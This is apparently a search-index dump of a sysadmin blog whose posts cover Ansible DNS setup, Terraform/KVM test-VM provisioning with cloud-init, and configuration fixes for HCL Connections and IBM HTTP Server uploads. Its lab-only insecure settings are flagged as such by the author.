preferences.yml │ │ ├──  molecule │ │ │ └──  default │ │ │ ├──  collections.yml │ │ │ ├──  converge.yml │ │ │ ├──  molecule.yml │ │ │ ├──  prepare.yml │ │ │ └──  verify.yml │ │ ├──  tasks │ │ │ ├──  assert.yml │ │ │ └──  main.yml │ │ ├──  templates │ │ │ ├──  named.conf.j2 │ │ │ └──  zone.j2 │ │ ├──  vars │ │ │ └──  main.yml │ │ ├──  CODE_OF_CONDUCT.md │ │ ├──  CONTRIBUTING.md │ │ ├──  LICENSE │ │ ├──  README.md │ │ ├──  requirements.txt │ │ ├──  requirements.yml │ │ ├──  SECURITY.md │ │ └──  tox.ini ├──  ansible.cfg ├──  README.md ├──  requirements.yml ├──  run-playbook.sh └──  site.ymlBash {linenos=false} If you used my Terraform repository to create the virtual machines, the default DNS server is set to 10.0.22.2 (or better to octet 2 of the configured ip range), but at the moment there is no DNS running and Ansible can\u0026rsquo;t install additional software.\nConnect to the machine ssh root@10.0.22.2 and change /etc/resolv.conf to nameserver 8.8.8.8.\nI normally place a shellscript to run the entire playbook without using a large commandline. There I add the STDOUT_CALLBACK environment variable when the switch -v or -vv is used, which adds more information to the Ansible output and formats it in a more readable way. Very handy for troubleshooting.\n./run-playbook.sh PLAY [dns] ********************************************************************* TASK [Gathering Facts] ********************************************************* ok: [cnx-ns.stoeps.home] TASK [robertdebock.dns : Add default DNS Server to resolv.conf] **************** changed: [cnx-ns.stoeps.home] TASK [robertdebock.dns : test if dns_port is set correctly] ******************** ok: [cnx-ns.stoeps.home -\u0026gt; localhost] TASK [robertdebock.dns : test if dns_caching_dns is set correctly] ************* ok: [cnx-ns.stoeps.home -\u0026gt; localhost] TASK [robertdebock.dns : test if dns_zones is set correctly] ******************* ok: [cnx-ns.stoeps.home -\u0026gt; localhost] TASK [robertdebock.dns : test if item in dns_zones is set correctly] *********** ok: [cnx-ns.stoeps.home -\u0026gt; localhost] =\u0026gt; (item=localhost) ok: [cnx-ns.stoeps.home -\u0026gt; localhost] =\u0026gt; (item=127.in-addr.arpa) ok: [cnx-ns.stoeps.home -\u0026gt; localhost] =\u0026gt; (item=0.in-addr.arpa) ok: [cnx-ns.stoeps.home -\u0026gt; localhost] =\u0026gt; (item=255.in-addr.arpa) ok: [cnx-ns.stoeps.home -\u0026gt; localhost] =\u0026gt; (item=stoeps.home) ... RUNNING HANDLER [robertdebock.dns : rndc reload] ******************************* changed: [cnx-ns.stoeps.home] PLAY RECAP ********************************************************************* cnx-ns.stoeps.home : ok=28 changed=13 unreachable=0 failed=0 skipped=4 rescued=0 ignored=0 A big advantage of using Ansible is idempotency, so when the role and playbook is written the right way, you can run it over and over again, and it will not change already configured stuff.\nRunning the command a second time:\n... TASK [robertdebock.dns : start and enable dns] ********************************* ok: [cnx-ns.stoeps.home] PLAY RECAP ********************************************************************* cnx-ns.stoeps.home : ok=28 changed=0 unreachable=0 failed=0 skipped=4 rescued=0 ignored=0 The handlers know that nothing has changed and the service is just running without restart.\nWhen I add additional records to the group_vars/dns.yml file, the dns is updated and restarted automatically to get the changes.\nSo it is easy to add new hosts to the dns server, just edit the dns.yml add a record and rerun Ansible in this repository.\nTodo let Terraform add new hosts to dns.yml so the dns server is always up-to-date Resources Ansible Galaxy ansible-pb-infra-demo : GitHub project with files to follow this post terraform-libvirt : Terraform files to create the infrastructure for this post ","excerpt":"\u003cp\u003eIn the post \u003ca href=\"https://stoeps.de/posts/2021/terraform-kvm-create-environment/\" title=\"Create A Test Environment With Terraform And KVM\"\u003eCreate A Test Environment with Terraform and KVM\u003c/a\u003e\n I created the first three virtual machines, now we configure a DNS server so name resolution works as expected.\u003c/p\u003e\n\u003cp\u003eSince HCL Connections started to add Kubernetes to the stack, we need to use proper name resolution instead of just editing \u003ccode\u003e/etc/hosts\u003c/code\u003e. That\u0026rsquo;s a bit of an effort, but in the end it is way easier than checking several hosts if the hosts file is uptodate.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/ansible-start-first-installation/","title":"Create your first installation with Ansible"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/galaxy/","title":"Galaxy"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/infrastructure/","title":"Infrastructure"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/infrastructure/","title":"Infrastructure"},{"body":"I create a lot of virtual machines during the week to test deployments, or try to digg into problems of deployments. In the past I used Vmware Workstation, Oracle VirtualBox or MS HyperV on my desktops, but I also used Vmware ESX. I tried to use Vagrant and Packer to prepare images and distribute them, but wasn\u0026rsquo;t satisfied at all.\nThe biggest issues with this was the time when I tried to use WSL2 and HyperV on a Windows machine. There even creating a seperate virtual network was hard, unreliable, and so I stopped trying this.\nWhat I want to achieve is automated and reliable distribution of virtual machines, easy management and performance.\nI never had the need to do distribution and deployment in one step, so I split the process into the distribution of the virtual machines with Terraform and then the deployment with Ansible. I could combine this in one step, but as I said no need to do this. Additional environments use seperate repositories or folders, so I can create or destroy multiple environments in parallel without affecting each other.\nThe advantage of Terraform is the amount of providers , so it is easy to adjust the definition and deploy it on a Cloud provider, Vmware host or whatever is around.\nInstall prerequisits Libvirt On my local Linux machine I use libvirt to create virtual machines through Terraform.\nTerraform I used this repository as a starting boilerplate for my Terraform projects with Centos Cloud images and libvirt virtualization. I uploaded one example to https://github.com/stoeps13/terraform-libvirt , so you can follow in the repository.\nI added an unsafe parameter to my virtual discs, so they work as a charme on my notebook to test roles and installations, but are not reliable to store production data!\nTerraform Provider Follow the README.md to set up the environment.\nDownload and configure cloud images Actually I use the latest available Centos GenericCloud image from: CentOS-7-x86_64-GenericCloud-2009.qcow2 , but just with exchanging the source in volume.tf to CentOS-8-GenericCloud-8.4.2105-20210603.0.x86_64.qcow2 I can build the same environment with a CentOS 8 image.\nThe cloud images are very handy, because you just need a file to configure the basic stuff like hostname, ip address, dns server, additional packages and your ssh keys for easy access later with Ansible.\nMy cloud_config.cfg 6 7 hostname: ${hostname} fqdn: ${fqdn} Hostname and fqdn are set to variables, which we will use from Terraform.\n8 ssh_pwauth: true Allow password authentication with SSH.\n11 12 13 14 15 16 17 18 19 20 21 users: - name: root ssh_authorized_keys: - ${file(\u0026#34;~/.ssh/id_rsa.pub\u0026#34;)} shell: /bin/bash - name: sysadm ssh_authorized_keys: - ${file(\u0026#34;~/.ssh/cnx6.pub\u0026#34;)} sudo: [\u0026#39;ALL=(ALL) NOPASSWD:ALL\u0026#39;] shell: /bin/bash groups: wheel This part generates a user sysadmin with the content of cnx6.pub as authorized key (key-authentication with SSH) and /bin/bash as shell, adds him to sudoers and the group wheel. The root user just gets an authorized key.\nI add one more user which will be used to run Ansible. My users connect with SSH keys, but still have a password to manage and test things after deployment.\nIt\u0026rsquo;s easy to add more keys, users, or commands.\n36 37 38 39 40 41 42 43 44 45 46 47 48 49 # change some passwords # # - create password: # makepasswd --minchars 20 --maxchars 20 # - hash the generated passwort with openssl: # (Note: passing -1 will generate an MD5 password, -5 a SHA256 and -6 SHA512 (recommened)) # openssl passwd -6 -salt fdfngmklndfgbl PASSWORD chpasswd: list: - root:$6$fdfngmklndfgbl$PnuPSSecvXm3gW3WQPDTqoP7WeoqgmSSI2TYvK8XELp1IwidyJG4uM9TSkhWW/EAcC4XN08IdZ5OGvj87aIST/ - sysadm:$6$fdfngmklndfgbl$PnuPSSecvXm3gW3WQPDTqoP7WeoqgmSSI2TYvK8XELp1IwidyJG4uM9TSkhWW/EAcC4XN08IdZ5OGvj87aIST/ - ansible:$6$fdfngmklndfgbl$PnuPSSecvXm3gW3WQPDTqoP7WeoqgmSSI2TYvK8XELp1IwidyJG4uM9TSkhWW/EAcC4XN08IdZ5OGvj87aIST/ expire: False The comment describes the commands which can be used to generate the password hashes.\nIn my case I even copied the hashes from user to user, but normally even with the same password they have different salted hashes. But as I already stated, I use this only for demos and to test updates or development stuff.\n85 86 87 88 89 90 91 92 packages: - bash-completion - vim - qemu-guest-agent - libselinux-python - policycoreutils-python - dnsmasq - python3 Install additional packages, like your favorite editor and python3, so Ansible can connect and work.\nThe rest of the file is pretty straight forward, you can add more packages and reboot it.\nHere can you find my complete file, which I use for my environments.\nConfigure hostname, ip address and disc configuration In terraform-libvirt.tfvars is the definition of our servers, the example file defines 3 virtual machines:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 servers = { \u0026#34;cnx-ns\u0026#34; = { # Name in virsh / kvm \u0026#34;memory\u0026#34; = 2*1024 # Memory: 2GB \u0026#34;vcpu\u0026#34; = 2 # 2 cores \u0026#34;disk_size\u0026#34; = 20*1024*1024*1024 # 20 GB Disc size octetIP = 2 # last octet of ip \u0026#34;hostname\u0026#34; = \u0026#34;cnx-ns\u0026#34; # Hostname } \u0026#34;cnx-nfs\u0026#34; = { \u0026#34;memory\u0026#34; = 2*1024 \u0026#34;vcpu\u0026#34; = 2 \u0026#34;disk_size\u0026#34; = 200*1024*1024*1024 octetIP = 3 \u0026#34;hostname\u0026#34; = \u0026#34;cnx-nfs\u0026#34; # Hostname } \u0026#34;cnx-ds\u0026#34; = { \u0026#34;memory\u0026#34; = 2*1024 \u0026#34;vcpu\u0026#34; = 2 \u0026#34;disk_size\u0026#34; = 20*1024*1024*1024 octetIP = 4 \u0026#34;hostname\u0026#34; = \u0026#34;cnx-ds\u0026#34; # Hostname } } I added some comments of the first server with the description of definitions used.\nSo now we need to add a domain (fqdn = hostname + domain) and the first three octets of the network address.\nThese can be set in main.tf:\n2 3 variable \u0026#34;domain\u0026#34; { default = \u0026#34;stoeps.home\u0026#34; } variable \u0026#34;prefixIP\u0026#34; { default = \u0026#34;10.0.22\u0026#34; } So the domain is stoeps.home and all ip addresses start with 10.0.22.\nSome of this things need to be repeated in network.tf which holds the basic network configuration.\nThe file network.tf is only present in my very first set of virtual machines! I use this repository to build a dns server, nfs server and directory server (ldap), so here I define the network and the servers run all the time. Additional machines use this network, but don\u0026rsquo;t define it, so I can create and destroy machines without affecting the network.\nAdditionally, I added in the end of main.tf:\n88 89 90 xml { xslt\t= \u0026#34;${file(\u0026#34;volume.xsl\u0026#34;)}\u0026#34; } Which adds the content of volume.xsl to the disc definitions, because without this, the storage access on my notebook was just too slow to create databases on DB2.\nThis article on serverfault describes more details and one solution is to add cache='unsafe' to the qemu driver. I found the solution here .\nSo I had to write a matching xsl to add this to all discs which are created by Terraform.\n12 13 14 15 16 17 \u0026lt;xsl:template match=\u0026#34;disk[@type=\u0026#39;volume\u0026#39;]/driver\u0026#34;\u0026gt; \u0026lt;xsl:copy\u0026gt; \u0026lt;xsl:attribute name=\u0026#34;cache\u0026#34;\u0026gt;unsafe\u0026lt;/xsl:attribute\u0026gt; \u0026lt;xsl:apply-templates select=\u0026#34;@*|node()\u0026#34;/\u0026gt; \u0026lt;/xsl:copy\u0026gt; \u0026lt;/xsl:template\u0026gt; You can change unsafe to writeback which can save the filesystem on power-outages. But I use the virtualization only for automated deployed machines, so I can get them back within some hours from Ansible and Terraform.\nCreate the machines The creator of the original repository created a Makefile as wrapper for the different terraform commands, for my test environments this speeds up the execution, so I stayed with it.\nCreate make apply This command generates three running machines, which can be configured with Ansible. Test connections with ssh root@10.0.22.2 for example.\nApply complete! Resources: 11 added, 0 changed, 0 destroyed. All done.\nssh root@10.0.22.2 Warning: Permanently added \u0026#39;10.0.22.2\u0026#39; (ED25519) to the list of known hosts. [root@cnx-ns ~]# No additional password prompt, we can start configuring with Ansible. In the next post I\u0026rsquo;ll show how to deploy a DNS server for the virtual environment.\nDestroy To destroy the environment, just use following command:\nmake destroy References cloud-init Documentation Git repository with example files libvirt in the ArchWiki ","excerpt":"\u003cp\u003eI create a lot of virtual machines during the week to test deployments, or try to digg into problems of deployments. In the past I used Vmware Workstation, Oracle VirtualBox or MS HyperV on my desktops, but I also used Vmware ESX. I tried to use Vagrant and Packer to prepare images and distribute them, but wasn\u0026rsquo;t satisfied at all.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/terraform-kvm-create-environment/","title":"Create A Test Environment With Terraform And KVM"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/kvm/","title":"Kvm"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/terraform/","title":"Terraform"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/newsletter/","title":"Newsletter"},{"body":"The newsletter in version 2 format has one big disadvantage, we or our users lost the easy links to the topic, author profile or application.\nNewsletter version 1 When we look at the same information in Newsletter version 2, we can\u0026rsquo;t open the profile or the main blog/application, just the post is linked on the \u0026ldquo;Open\u0026rdquo; link.\nNewsletter version 2 with default settings The links are stored in the homepage database and are stripped away during the generation of the newsletter/notification message.\n/opt/IBM/WebSphere/AppServer/profiles/Dmgr01/config/cells/CellName/LotusConnections-config/notifications_v2/resources/commonUtil.ftl 391 392 393 394 395 396 397 398 399 400 401 402 \u0026lt;#-- Convert html fragment structures to text # Strip all tags but preserve html entities # Structural tags converted to white space to maintain word separation # Link URL\u0026#39;s are discarded # --\u0026gt; \u0026lt;#function convertHtmlStructuresToText html\u0026gt; \u0026lt;#if html??\u0026gt; \u0026lt;#return __convertHtmlStructuresToText(html?string) /\u0026gt; \u0026lt;#else\u0026gt; \u0026lt;#return html /\u0026gt; \u0026lt;/#if\u0026gt; \u0026lt;/#function\u0026gt; This function is called to prepare the headings in the notifications. So we can remove the call, or just return the html after the call:\n391 392 393 394 395 396 397 398 399 400 401 402 \u0026lt;#-- Convert html fragment structures to text # Strip all tags but preserve html entities # Structural tags converted to white space to maintain word separation # Link URL\u0026#39;s are discarded # --\u0026gt; \u0026lt;#function convertHtmlStructuresToText html\u0026gt; \u0026lt;#if html??\u0026gt; \u0026lt;#return html /\u0026gt; # \u0026lt;.\u0026gt; \u0026lt;#else\u0026gt; \u0026lt;#return html /\u0026gt; \u0026lt;/#if\u0026gt; \u0026lt;/#function\u0026gt; Replace the original line here with the highlighted code.\nNow synchronize the nodes and test it again:\nNewsletter version 2 with customized header ","excerpt":"\u003cp\u003eThe newsletter in version 2 format has one big disadvantage, we or our users lost the easy links to the topic, author profile or application.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/newsletter_v2_tweak/","title":"Tweak HCL Connections Newsletter v2"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/administration/","title":"Administration"},{"body":"Connections 7 has a new Administration Console to access Communities Template administration and Mobile Administration.\nThe Administration Console can be reached on https://cnx-hostname/cnxadmin/. The / at the end is important, because the ingress rule just forwards /cnxadmin/(.*).\nOn Firefox you get this view:\n/cnxadmin/ panel With Chrome (Chromium, Edge) the left menu is missing. There is a display: inline-flex for some elements in index.css of the Administration Console.\nSo how can we inject a repaired css file into the container?\nConfigMap One quick and dirty way is to use a configMap with the adjusted stylesheet. So I did the following:\n.Get the pod name of the admin-portal deployment\nADMIN_PORTAL=$(kubectl get pod -l app=admin-portal -o custom-columns=:metadata.name --no-headers) echo $ADMIN_PORTAL admin-portal-7f774c77f9-b8nxw .Copy index.css to your machine\nkubectl cp $ADMIN_PORTAL::/usr/share/nginx/html/css/index.css index.css .Change css and replace inline-flex with flex\nsed -i -e \u0026#39;s/inline-flex/flex/g\u0026#39; index.css .Create ConfigMap\nkubectl create configmap cnxadmin-fix --from-file=index.css Now we have to mount the configmap into the admin-portal deployment to make this change permanent.\nkubectl edit deployment admin-portal -n connections .Search for volumes and add the ConfigMap\nvolumes: - name: redis-secret-vol secret: defaultMode: 420 secretName: redis-secret - configMap:\t# Add this and the next 3 lines after the redis-secret defaultMode: 420 name: cnxadmin-fix name: cnxadmin-fix Keep the file open and search for volumeMounts\nvolumeMounts: - mountPath: /etc/redis/redis-secret name: redis-secret-vol - mountPath: /usr/share/nginx/html/css # Mount the configmap to the original path name: cnxadmin-fix Now save the file and the pod will restart automatically. This will fix the menu problem with Chromiumbased browsers, the menu is visible, but still little bit too high. Feel free to fix this too.\n/cnxadmin/ fixed One more issue with the Administration Console - Aha Idea The Administration Console loads css and fonts from external urls.\n\u0026lt;link rel=\u0026#34;stylesheet\u0026#34; href=\u0026#34;//cdn.rawgit.com/necolas/normalize.css/master/normalize.css\u0026#34;\u0026gt; \u0026lt;link rel=\u0026#34;stylesheet\u0026#34; href=\u0026#34;https://fonts.googleapis.com/css?family=Roboto:300,400,500,700\u0026amp;amp;display=swap\u0026#34;\u0026gt; \u0026lt;link rel=\u0026#34;stylesheet\u0026#34; href=\u0026#34;https://fonts.googleapis.com/icon?family=Material+Icons\u0026#34;\u0026gt; That\u0026rsquo;s an issue in some environments and I think it is better and more secure to have all elements of On-Premises Connections on the Connections servers. I added a AHA Idea to get this fixed.\n","excerpt":"\u003cp\u003eConnections 7 has a new Administration Console to access Communities Template administration and Mobile Administration.\u003c/p\u003e\n\u003cp\u003eThe Administration Console can be reached on https://cnx-hostname/cnxadmin/. The \u003ccode\u003e/\u003c/code\u003e at the end is important, because the ingress rule just forwards \u003ccode\u003e/cnxadmin/(.*)\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eOn Firefox you get this view:\u003c/p\u003e\n\u003cfigure\u003e\u003ca href=\"/images/2021/cnxadmin.png\"\u003e\u003cimg src=\"/images/2021/cnxadmin.png\"\u003e\u003c/a\u003e\u003cfigcaption\u003e\n \u003ch4\u003e/cnxadmin/ panel\u003c/h4\u003e\n \u003c/figcaption\u003e\n\u003c/figure\u003e\n\n\u003cp\u003eWith Chrome (Chromium, Edge) the left menu is missing. There is a \u003ccode\u003edisplay: inline-flex\u003c/code\u003e for some elements in \u003ccode\u003eindex.css\u003c/code\u003e of the Administration Console.\u003c/p\u003e\n\u003cp\u003eSo how can we inject a repaired \u003ccode\u003ecss\u003c/code\u003e file into the container?\u003c/p\u003e\n\u003ch2 id=\"configmap\"\u003eConfigMap \u003ca href=\"#configmap\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eOne quick and dirty way is to use a configMap with the adjusted stylesheet. So I did the following:\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/cnxadmin-panel-on-chrome/","title":"Repair Administration Panel of Connections 7 for Chromium-based Browsers"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ibm-http-server/","title":"IBM HTTP Server"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ihs/","title":"IHS"},{"body":"The last days I analyzed an issue, that file uploads to HCL Connections via IBM HTTPServer stopped working on a fresh installed 6.5CR1.\nToday I configured a Connections 7 and tried with it. I think that the official documentation is old in some important parts for the upload configuration.\nFirst of all my IBM HTTPServer 8.5.5.18 is not 32-bit like the documentation tells us:\nThe IBM HTTP Server process is 32-bits in both cases and requires 32-bit modules.\nWhen I check my installed HTTP Server (which was installed with the official Ansible scripts), I see this:\n[root@cnx7 upload]# /opt/IBM/HTTPServer/bin/apachectl -V Server version: IBM_HTTP_Server/8.5.5.18 (Unix) Apache version: 2.2.8 (with additional fixes) Server built: Jun 24 2020 16:56:21 Build level: IHS85/webIHS2025.01 Server\u0026#39;s Module Magic Number: 20051115:23 Server loaded: APR 1.2.12, APR-Util 1.2.12 Compiled using: APR 1.2.12, APR-Util 1.2.12 Architecture: 64-bit Server MPM: Worker threaded: yes (fixed thread count) forked: yes (variable process count) So when you use the 32-Bit one, you get following message during HTTPServer start:\n[Mon Apr 26 07:57:52 2021] [warn] module rewrite_module is already loaded, skipping httpd: Syntax error on line 1059 of /opt/IBM/HTTPServer/conf/httpd.conf: Syntax error on line 2 of /opt/IBM/HTTPServer/conf/httpd-upload.conf: Cannot load modules/mod_ibm_u server: /opt/IBM/HTTPServer/modules/mod_ibm_upload.so: wrong ELF class: ELFCLASS32 The Ansible roles do not configure IHS Upload, this needs to be done manually.\nSo now we know that we need a 64 bit module and copy it to IHS.\n[root@cnx7 upload]# ls -al /opt/HCL/Connections/ihs/mod_ibm_upload/ total 12 drwxr-xr-x. 12 root root 273 Apr 26 14:28 . drwxr-xr-x. 4 root root 58 Apr 22 10:37 .. drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.aix.ppc32 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.aix.ppc64 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.linux.amd64 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.linux.ia32 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.linux.ppc32 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.linux.ppc64 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.linux.s390 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.linux.s390_64 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.linux.x86_64 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.win.ia32 -rw-r--r--. 1 root root 2101 Nov 23 14:54 MD5 -rw-r--r--. 1 root root 100 Nov 23 14:54 README -rw-r--r--. 1 root root 151 Nov 23 14:54 README.txt Hmm, I have no idea why there are two versions for 64-bit Linux!\nSize and checksum are different\n[root@cnx7 upload]# sha256sum /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.amd64/mod_ibm_upload.so 13a23a23bbd19d34c99e0cdefea30f09e0ecf14a22c5bc3399b6f7f9908fa7ec /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.amd64/mod_ibm_upload.so [root@cnx7 upload]# sha256sum /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.x86_64/mod_ibm_upload.so 0057b7e0ca816891f98f715d62cb41cdccaa5cfee5718a3465b2f005e95aed24 /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.x86_64/mod_ibm_upload.so [root@cnx7 upload]# ls -al /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.x86_64/mod_ibm_upload.so -rw-r--r--. 1 root root 36360 Nov 23 14:54 /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.x86_64/mod_ibm_upload.so [root@cnx7 upload]# ls -al /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.amd64/mod_ibm_upload.so -rw-r--r--. 1 root root 36520 Nov 23 14:54 /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.amd64/mod_ibm_upload.so Ok, so now everything is in place, I used the x86_64 version of the module and copied it to /opt/IBM/HTTPServer/modules, then I copied the config from the documentation for the files application to my virtualhost and set the parameters for uploads in\nfiles-config.xml\n... \u0026lt;file\u0026gt; ... \u0026lt;media maximumSizeInKb=\u0026#34;2048000\u0026#34;/\u0026gt; ... \u0026lt;/file\u0026gt; \u0026lt;api\u0026gt; ... \u0026lt;simpleUploadAPI maximumSizeInKb=\u0026#34;128000\u0026#34;\u0026gt; \u0026lt;organization estimatedBytesInSeconds=\u0026#34;2097152\u0026#34; id=\u0026#34;admin_replace\u0026#34; maxConcurrenceRequests=\u0026#34;50\u0026#34; maximumSizeInKb=\u0026#34;128000\u0026#34;/\u0026gt; \u0026lt;/simpleUploadAPI\u0026gt; ... \u0026lt;/api\u0026gt; ... \u0026lt;upload\u0026gt; \u0026lt;modIBMUpload enabled=\u0026#34;true\u0026#34;/\u0026gt; \u0026lt;/upload\u0026gt; Set the maximum upload size for single files\nUse the simpleUploadAPI (direct through Websphere) until 128MB\nSame for the organisation 128MB uses WebSphere\nUpload through IHS enabled (default)\nAfter Node synchronization and restart of HTTP and Applicationserver I found following:\nUploads up to 128 MB worked\nUploads from 128 MB to 500 MB were uploaded through IHS (I found different user in the files uploads)\nUploads larger 500 MB stuck at around 500 MB and did not finish.\nThe IHS error_log showed following:\n[Mon Apr 26 13:34:38 2021] [error] [client 10.0.11.1:44186] Error: resumable upload disabled but Content-Range header used, referer: https://cnx7.stoeps.internal/files/app I searched for more configuration settings, more details to the upload module, but couldn’t find anything.\nI was pretty sure that there is a configuration option to enable the resumable upload, but couldn’t find it on any IBM or HCL page.\nSo I tried with strings and Ghidra :\nstrings modules/mod_ibm_upload.so | grep resum ... resumable upload disabled but Content-Range header used Non-resumable upload has been canceled. part-complete;resumable;authenticate On|Off - Enable/disable (default) resumable upload resumable_disabled complete;resumable;forward complete;resumable;phase2 cmd_ibmuploadactivateresumable So there is an option to configure resumable uploads.\nI opened the mod_ibm_upload.so with ghidra and there I found:\nThere are configuration parameter to enable resumable uploads and a size limit where only one part is uploaded. So in my opinion the IBMUploadMinimumPartSize is default 500MB and IBMUploadActivateResumable is Off by default. I never had to use this in 6.0, so I’m pretty sure one of these defaults changed in the last versions (6.5 or 6.5CR1), or the files application forces it now.\nSo I changed the config in httpd.conf to:\n\u0026lt;Location \u0026#34;/ihs/files\u0026#34;\u0026gt; IBMUploadHandler On SetHandler ibm_upload_handler IBMUploadBaseStore \u0026#34;/opt/IBM/SharedArea/files/upload/files\u0026#34; IBMUploadMethods POST,PUT IBMUploadURLPrefix /ihs IBMUploadActivateResumable On \u0026lt;/Location\u0026gt; After restarting the IBM HTTPServer, my files \u0026gt; 500MB uploaded without any issue!\nThe upload module can be used only when WebSphere Application Server is not run as user root. Otherwise, file permissions prevent the application server and the IBM HTTP Server from exchanging files. For security reasons, do not run the application server as root, but if that is not an option, then large files still can be uploaded. If WebSphere Application Server is run as root, consider making the following change to the maximumSizeInKb property for thesimpleUploadAPI file.\nI think running WebSphere as a non-root user is best practise, but for example the Ansible scripts install them for root in the moment. So when you use root for WebSphere, have a look at setfacl and add the http server user to your files/upload directory, so IHS is allowed to upload to that folders.\n","excerpt":"\u003cp\u003eThe last days I analyzed an issue, that file uploads to HCL Connections via IBM HTTPServer stopped working on a fresh installed 6.5CR1.\u003c/p\u003e\n\u003cp\u003eToday I configured a Connections 7 and tried with it.\nI think that the \u003ca href=\"https://help.hcltechsw.com/connections/v7/admin/install/t_install_post_files_uploads.html?hl=upload\" target=\"_blank\"\u003eofficial documentation \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is old in some important parts for the upload configuration.\u003c/p\u003e\n\u003cp\u003eFirst of all my IBM HTTPServer 8.5.5.18 is not 32-bit like the documentation tells us:\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/cnx-file-upload-through-ihs/","title":"Upload Files via IBM HTTPServer (mod_ibm_upload) to HCL Connections"},{"body":"Since IBM Connections 6.0CR4 we can use a new newsletter format which needs still (now with HCL Connections 7) be activated separately in LotusConnections-config/notification-config.xml.\nToday some users asked how they can add other users to their private communities (visible in Community catalog) without manually adding them. As we investigated the question I had a look at the old notification format.\nSo there a community owner got following e-mail when a user requested to join:\nMail notification for community owner So he could directly add the requesting user to the community.\nNow we switched to the new v2 format and the mail looks like this:\nMail notification for community owner in version 2 So the \u0026ldquo;Add Member\u0026rdquo; link disappeared. So what happens when we use \u0026ldquo;Open\u0026rdquo;? Yes it opens the community and I can\u0026rsquo;t see any link or option where I can answer these requests within the community. This was the reason for the users question, because they added the requesters manually with \u0026ldquo;Add member\u0026rdquo;.\nWhich other options does the user have to add the requesting members?\nNotification Bell Notification about user requesting community membership There they get the information about the request, but clicking on the notification opens the Community and as we already know: you can\u0026rsquo;t see the request there.\nAction Required The only way to say and click the \u0026ldquo;Add member\u0026rdquo; link is \u0026ldquo;Action Required\u0026rdquo; in the old Homepage (sorry, but I haven\u0026rsquo;t deployed Orient Me until now, so I don\u0026rsquo;t know if you see it there).\nAction required Workaround So how can we get the link \u0026ldquo;Add Member\u0026rdquo; into the notification email again?\nLotusConnections-config/notifications_v2/communities/requestToJoinMail.ftl 27 28 29 30 31 32 33 34 35 \u0026lt;#-- Default \u0026#39;Open\u0026#39; Action --\u0026gt; \u0026lt;#assign defaultAction = comUrlUtil.linkifyContainer(community.url, comUtil.resource(\u0026#39;OPEN_LINK_TEXT\u0026#39;), {}, comStyleUtil.actionArgs) /\u0026gt; \u0026lt;#-- Actions --\u0026gt; \u0026lt;#assign actions = [ defaultAction ] /\u0026gt; \u0026lt;#-- Deprecated Actions --\u0026gt; \u0026lt;#-- comUrlUtil.linkifyContainer(community.url, comUtil.resource(\u0026#34;email.open.community\u0026#34;)) --\u0026gt; \u0026lt;#-- comUrlUtil.linkifySpecial(comUrlUtil.LINK_ID.COMMUNITIES.MEMBERS, community.members.url, comUtil.resource(\u0026#34;email.add.this.person\u0026#34;)) --\u0026gt; Deprecated Action \u0026ldquo;email.add.this.person\u0026rdquo; let\u0026rsquo;s check this\n27 28 29 30 31 32 33 34 35 36 37 \u0026lt;#-- Default \u0026#39;Open\u0026#39; Action --\u0026gt; \u0026lt;#assign defaultAction = comUrlUtil.linkifyContainer(community.url, comUtil.resource(\u0026#39;OPEN_LINK_TEXT\u0026#39;), {}, comStyleUtil.actionArgs) /\u0026gt; \u0026lt;#-- Actions --\u0026gt; \u0026lt;#assign actions = [ comUrlUtil.linkifySpecial(comUrlUtil.LINK_ID.COMMUNITIES.MEMBERS, community.members.url, comUtil.resource(\u0026#34;email.add.this.person\u0026#34;), comStyleUtil.actionArgs) defaultAction ] /\u0026gt; \u0026lt;#-- Deprecated Actions --\u0026gt; \u0026lt;#-- comUrlUtil.linkifyContainer(community.url, comUtil.resource(\u0026#34;email.open.community\u0026#34;)) --\u0026gt; \u0026lt;#-- comUrlUtil.linkifySpecial(comUrlUtil.LINK_ID.COMMUNITIES.MEMBERS, community.members.url, comUtil.resource(\u0026#34;email.add.this.person\u0026#34;)) --\u0026gt; Copy the line to the actions, remove the comment signs and add , comStyleUtil.actionArgs) into the function, this adds the same styles as for \u0026ldquo;Open\u0026rdquo;\nWhen we synchronize the nodes and restart the news application we get following notification:\nCustomized newsletter with direct action So we got back some usability, but in my opinion I miss a view in each Community to see the \u0026ldquo;Join Requests\u0026rdquo; like the view \u0026ldquo;Invitations\u0026rdquo; in the members\u0026rsquo; widget.\nThere is already an enhancement request / idea in the Product Ideas 